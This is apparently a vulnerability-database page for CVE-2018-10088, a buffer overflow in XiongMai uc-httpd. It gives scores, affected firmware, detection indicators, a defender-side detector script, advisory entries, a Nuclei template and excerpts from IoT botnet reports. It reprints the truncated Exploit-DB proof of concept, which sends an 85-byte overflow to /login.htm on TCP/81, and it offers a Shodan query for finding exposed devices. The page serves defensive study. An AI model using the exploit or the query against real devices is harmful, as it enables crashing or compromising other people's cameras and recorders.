CVE-2018-10088
Published: 2018-06-08
Buffer overflow in XiongMai uc-httpd 1.0.0 has unspecified impact and attack vectors, a different vulnerability than CVE-2017-16725.
Priority: P1 · 80 · critical · 9.8 (CVSS 3.0)
CVSS 3.0 vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 40.39% (98.5th percentile)
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xiongmaitech | mbd6304t_firmware | — | — |
| xiongmaitech | nbd6808t-pl_firmware | — | — |
| xiongmaitech | uc-httpd | — | — |
Detection & IOCs (extracted from sources)
- Detect exploitation attempts by matching HTTP POST requests to /login.htm with an oversized 'username' parameter (85+ 'A' characters) on TCP port 81, targeting XiongMai uc-httpd devices.
- Identify vulnerable XiongMai uc-httpd 1.0.0 hosts by checking for the 'uc-httpd' string in the HTTP Server response header, version <= 1.0.0.
- Use Shodan query cpe:"cpe:2.3:a:xiongmaitech:uc-httpd" to enumerate internet-exposed vulnerable devices.
- The overflow is triggered via an 85-byte 'A' pattern in the username POST parameter; monitor for abnormally long username fields in POST requests to /login.htm.
- The exploit proof-of-concept targets TCP port 81 specifically as tested on KKMoon DVR hardware; the actual deployment port may vary across Xiongmai device models.
- CVE-2018-10088 has unspecified impact and attack vectors per NVD; the exploit-db PoC demonstrates a crash/DoS condition, but full RCE has not been publicly confirmed for this specific CVE.
- This CVE is distinct from CVE-2017-16725 and CVE-2022-45460, though all three affect Xiongmai HTTP server components; detection rules should not conflate them.
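The two detection ideas above (oversized `username` in a POST to `/login.htm`, and a `uc-httpd` Server banner at version 1.0.0 or lower) can be turned into simple checks. The following is an added example written for this page, not code from any of the sources it cites. It assumes raw HTTP requests are available as bytes (for example from a proxy log or a packet capture) and that a device's Server header is available as a string; the 85-byte threshold comes from the PoC description above, and the sample traffic is constructed, not captured.

```python
"""Defender-side checks for the CVE-2018-10088 traffic pattern (added example)."""
import re
from urllib.parse import parse_qs

# The public PoC sends 85 'A' bytes in the username field; treat that length or more as oversized.
USERNAME_LEN_THRESHOLD = 85
LOGIN_PATH = "/login.htm"

# Assumed banner shapes: "uc-httpd 1.0.0" or "uc-httpd/1.0.0"; the version part is optional.
SERVER_RE = re.compile(r"^uc-httpd(?:[ /](\d+(?:\.\d+)*))?\b", re.IGNORECASE)
LAST_VULNERABLE_VERSION = (1, 0, 0)


def parse_http_request(raw: bytes):
    """Split a raw request into (method, target, headers, body); raises ValueError on malformed input."""
    head, _sep, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)  # ValueError if the request line is short
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def is_oversized_login_post(raw: bytes, threshold: int = USERNAME_LEN_THRESHOLD) -> bool:
    """True when the request is a POST to /login.htm whose username field is >= threshold bytes."""
    try:
        method, target, _headers, body = parse_http_request(raw)
    except ValueError:
        return False  # unparseable input is not this pattern; log it elsewhere if desired
    path = target.split("?", 1)[0]
    if method.upper() != "POST" or path != LOGIN_PATH:
        return False
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    return any(len(value) >= threshold for value in fields.get("username", []))


def is_candidate_uc_httpd_banner(server_header: str) -> bool:
    """True for a uc-httpd Server banner at version <= 1.0.0, or with no version advertised."""
    match = SERVER_RE.match(server_header.strip())
    if not match:
        return False
    if match.group(1) is None:
        return True  # version not advertised: keep as a candidate for manual verification
    version = tuple(int(part) for part in match.group(1).split("."))
    return version <= LAST_VULNERABLE_VERSION


def flag_requests(requests):
    """Return the indices of requests that match the oversized-login pattern."""
    return [i for i, raw in enumerate(requests) if is_oversized_login_post(raw)]


def _request(method: str, target: str, body: bytes = b"") -> bytes:
    """Build a minimal constructed request for the samples below (hypothetical host/port)."""
    head = f"{method} {target} HTTP/1.1\r\nHost: 192.0.2.10:81\r\nContent-Length: {len(body)}\r\n\r\n"
    return head.encode("latin-1") + body


# Constructed sample traffic, not captured from a real device.
SAMPLE_REQUESTS = [
    _request("POST", "/login.htm", b"username=admin&password=admin"),           # ordinary login
    _request("POST", "/login.htm", b"username=" + b"A" * 85 + b"&password=x"),  # PoC-shaped
    _request("GET", "/login.htm"),                                              # no body
    _request("POST", "/other.cgi", b"username=" + b"A" * 200),                  # different path
]

if __name__ == "__main__":
    print("flagged request indices:", flag_requests(SAMPLE_REQUESTS))
    for banner in ("uc-httpd 1.0.0", "uc-httpd/1.0.1", "nginx/1.18.0"):
        print(banner, "->", is_candidate_uc_httpd_banner(banner))
```

The banner check deliberately returns True when no version is advertised, so unversioned `uc-httpd` hosts are surfaced for manual confirmation rather than silently dropped; the request check ignores the port, since the PoC's TCP/81 may differ across device models as noted above.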
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| VulnCheck | — | 9.8 | CRITICAL | — |
GHSA
GHSA-pm7h-vr37-wmc9: Multiple Xiongmai NVR devices, including MBD6304T V4
ghsa_unreviewed · 2023-03-29 · CVSS 9.8 · CVE-2022-45460 [CRITICAL] · CWE-787
Multiple Xiongmai NVR devices, including MBD6304T V4.02.R11.00000117.10001.131900.00000 and NBD6808T-PL V4.02.R11.C7431119.12001.130000.00000, allow an unauthenticated and remote user to exploit a stack-based buffer overflow and crash the web server, resulting in a system reboot. An unauthenticated and remote attacker can execute arbitrary code by sending a crafted HTTP request that triggers the overflow condition via a long URI passed to a sprintf call. NOTE: this is different than CVE-2018-10088, but this may overlap CVE-2017-16725.
GHSA
GHSA-3h69-fjjv-586m: Buffer overflow in XiongMai uc-httpd 1
ghsa_unreviewed · 2022-05-14 · CVSS 9.8 · CVE-2018-10088 [CRITICAL] · CWE-119
Buffer overflow in XiongMai uc-httpd 1.0.0 has unspecified impact and attack vectors, a different vulnerability than CVE-2017-16725.
VulnCheck
xiongmaitech uc-httpd Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck · 2018 · CVSS 9.8 · CVE-2018-10088 [CRITICAL]
Buffer overflow in XiongMai uc-httpd 1.0.0 has unspecified impact and attack vectors, a different vulnerability than CVE-2017-16725.
Affected: xiongmaitech uc-httpd
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.netlab.360.com/botnets-never-die-satori-refuses-to-fade-away-en/; https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai; https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits; https://cybersecurity.att.com/blogs/la
No detection rules found.
Exploit-DB
XiongMai uc-httpd 1.0.0 - Buffer Overflow
exploitdb · 2018-06-08 · CVSS 9.8 · CVE-2018-10088 [CRITICAL]
---
```python
# Exploit Title: XiongMai uc-httpd 1.0.0 - Buffer Overflow
# Date: 2018-06-08
# Exploit Author: Andrew Watson
# Software Version: XiongMai uc-httpd 1.0.0
# Vendor Homepage: http://www.xiongmaitech.com/en/
# Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on TCP/81
# CVE ID: CVE-2018-10088
# DISCLAIMER: This proof of concept is provided for educational purposes only!
#!/usr/bin/python
import socket
import sys
payload="A" * 85
print "\n###############################################"
print "XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit"
if len(sys.argv) < 2:
    sys.exit()
print "\nTarget: " + sys.argv[1]
print "Sending exploit..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],81))
s.send('POST /login.htm H
```
Nuclei
XiongMai uc-httpd 1.0.0 - Buffer Overflow
nuclei · CVSS 9.8 · CVE-2018-10088 [CRITICAL]
Buffer overflow in XiongMai uc-httpd 1.0.0 has unspecified impact and attack vectors, a different vulnerability than CVE-2017-16725.
Template:
```yaml
id: CVE-2018-10088

info:
  name: XiongMai uc-httpd 1.0.0 - Buffer Overflow
  author: 0x_Akoko
  severity: critical
  description: |
    Buffer overflow in XiongMai uc-httpd 1.0.0 has unspecified impact and attack vectors, a different vulnerability than CVE-2017-16725.
  impact: |
    Potential for remote code execution or denial of service when successfully exploited.
  remediation: |
    Update to the latest version of uc-httpd or apply security patches provided by the vendor.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10088
    - https://www.exploit-db.com/exploits/44864
    - https://github.com/bitfu/uc-httpd-1.0.0-buffe
```
Fortinet
The Ghosts of Mirai | FortiGuard Labs
blogs_fortinet · 2021-06-24
FORTIGUARD LABS THREAT RESEARCH
By David Maciejak and Joie Salvio | June 24, 2021
FortiGuard Labs Threat Research Report
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
It has been almost five years since the source code of the notorious MIRAI IoT malware was released to the public by its author in late 2016. This event led to the emergence of numerous copycats, creating their own flavors of IoT botnet armies. Although improvements have been constantly added since then by various threat actors, the structure and goal of the campaigns have remained the same.
IoT malware scans the Internet for IoT devices that use default or weak usernames and passwords. They also seek
Securelist
New trends in the world of IoT threats
blogs_securelist · 2018-09-18
Authors
- Mikhail Kuzin
- Yaroslav Shmelev
- Vladimir Kuskov
Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.
We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.
Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018.
One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our honeypot